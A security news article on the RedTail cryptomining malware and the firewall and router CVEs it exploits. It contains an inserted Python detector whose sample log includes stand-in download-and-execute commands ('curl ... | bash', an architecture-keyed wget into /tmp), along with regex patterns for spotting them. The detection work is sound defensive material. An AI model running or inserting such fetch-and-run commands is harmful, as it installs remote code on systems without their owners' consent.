RedTail: Ghost Miner Attacks Firewalls by Hiding in Cryptocurrency Pools

Experts have already suggested which hacker group may be behind the spread of the malware.

The attackers behind the RedTail malware have added a newly discovered vulnerability in Palo Alto Networks' firewalls to their attack arsenal. The updated malware also includes new anti-analysis techniques, according to experts from Akamai, a company specializing in web infrastructure and security.

Security experts Ryan Barnett, Stiv Kupchik and Maxim Zavodchik noted in their technical report that the attackers took a step forward by using private cryptocurrency mining pools to gain more control over the results of mining, despite the increased operational and financial costs.

The attack begins by exploiting a vulnerability in PAN-OS, CVE-2024-3400, which allows an unauthorized attacker to execute arbitrary code with superuser rights on the firewall. After a successful compromise, commands are executed to download and run a bash script from an external domain, which then downloads the RedTail malware build matching the processor architecture.
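The delivery chain just described (a download piped into a shell, followed by a second fetch that selects a payload by CPU architecture) is something a defender can look for in command-audit logs from the appliance. The following detector is an added example written for this post; it is not Akamai's code and not from the forum author. The log format, the host names, the `.invalid` domains and every sample line are constructed, and the regular expressions are heuristics, not indicators published by anyone. It flags each stage on its own and raises a high-severity finding when both stages occur on the same host within a short window; the last sample line is a plain download with no shell pipe and no architecture selector, so it deliberately produces no finding.

```python
"""Detection sketch for a staged dropper chain of the kind described above.

Added example: not Akamai's or the forum author's code. The audit-log
format and every sample line are constructed for illustration.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample lines: "<ISO timestamp> <host> <user> <command>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z fw01 root curl -fsSL http://downloads.example.invalid/setup.sh | bash
2024-05-01T10:00:04Z fw01 root wget -q http://downloads.example.invalid/bin/$(uname -m) -O /tmp/.cache
2024-05-01T10:05:00Z fw01 admin show system info
2024-05-01T10:06:00Z fw02 root /usr/bin/curl -s https://updates.example.invalid/manifest.json -o /tmp/manifest.json
"""

DOWNLOAD_TOOL = re.compile(r"\b(?:curl|wget)\b")
# A fetched body handed straight to a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|da|z)?sh\b")
# A fetch whose URL or path is chosen by machine architecture.
ARCH_SELECTOR = re.compile(r"uname\s+-m|\b(?:x86_64|aarch64|armv\d\w*|i[3-6]86|mips\w*)\b")
# Stage 1 and stage 2 on the same host within this window are correlated.
CHAIN_WINDOW = timedelta(minutes=5)


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    cmd: str


@dataclass
class Finding:
    line_no: int
    host: str
    rule: str
    severity: str


def parse_line(line: str) -> Event:
    """Split one constructed audit line into its four fields."""
    ts, host, user, cmd = line.split(maxsplit=3)
    return Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, user, cmd)


def classify(event: Event) -> list[str]:
    """Return the per-line rule names that match this command."""
    rules = []
    if DOWNLOAD_TOOL.search(event.cmd):
        if PIPE_TO_SHELL.search(event.cmd):
            rules.append("download_piped_to_shell")
        if ARCH_SELECTOR.search(event.cmd):
            rules.append("arch_dependent_fetch")
    return rules


def scan_log(text: str) -> list[Finding]:
    """Scan audit lines in order and correlate the two dropper stages per host."""
    findings: list[Finding] = []
    last_stage1: dict[str, datetime] = {}  # host -> time of last piped download
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        ev = parse_line(raw)
        for rule in classify(ev):
            findings.append(Finding(line_no, ev.host, rule, "medium"))
            if rule == "download_piped_to_shell":
                last_stage1[ev.host] = ev.ts
            elif rule == "arch_dependent_fetch":
                t0 = last_stage1.get(ev.host)
                if t0 is not None and ev.ts - t0 <= CHAIN_WINDOW:
                    findings.append(Finding(line_no, ev.host, "staged_dropper_chain", "high"))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} host={f.host} {f.severity}: {f.rule}")
```

The correlation step is the part worth keeping when you adapt this to real telemetry: either stage alone is noisy on an administrator's workstation, but a piped download followed within minutes by an architecture-keyed fetch on a firewall, running as root, is exactly the shape of the chain the post describes and deserves a high-priority alert.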

RedTail also uses other distribution mechanisms, exploiting known vulnerabilities in TP-Link routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062) and Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887), as well as VMware Workspace ONE Access and Identity Manager (CVE-2022-22954).

The first mention of RedTail came in January 2024, when security researcher Patryk Machowiak documented a campaign exploiting the Log4Shell vulnerability (CVE-2021-44228) to inject malware on Unix-based systems.

In March 2024, Barracuda Networks revealed details of cyberattacks exploiting vulnerabilities in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) for installing variants of the Mirai botnet, as well as flaws in ThinkPHP for deploying RedTail.

The latest version of the miner, revealed in April, includes significant updates such as the encrypted configuration used to run the built-in XMRig miner. The instance also lacks a hard-coded cryptocurrency wallet, which may indicate that attackers have switched to private mining pools or proxy pools.

Experts noted that the latest malware configuration shows the desire of attackers to optimize the mining process, including through the use of advanced evasion and stability techniques. All this shows that hackers have a deep understanding of the principles of cryptomining.

Akamai described RedTail as high-quality malware, which is rare among cryptocurrency mining families. The exact identities of the attackers are still unknown, but the use of private mining pools is similar to the tactics used by the North Korean group Lazarus, which is known for large-scale cyber attacks for financial gain.